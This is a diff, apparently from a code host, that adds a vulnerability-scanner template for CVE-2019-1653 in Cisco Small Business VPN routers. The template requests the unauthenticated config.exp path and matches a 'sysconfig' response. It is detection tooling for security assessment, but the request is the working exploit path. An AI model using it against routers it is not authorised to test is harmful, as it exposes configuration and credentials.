commit
5254fb77af
|
@ -0,0 +1,20 @@
|
|||
id: cve-2019-1653
|
||||
|
||||
info:
|
||||
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/config.exp"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "sysconfig"
|
||||
part: body
|
Loading…
Reference in New Issue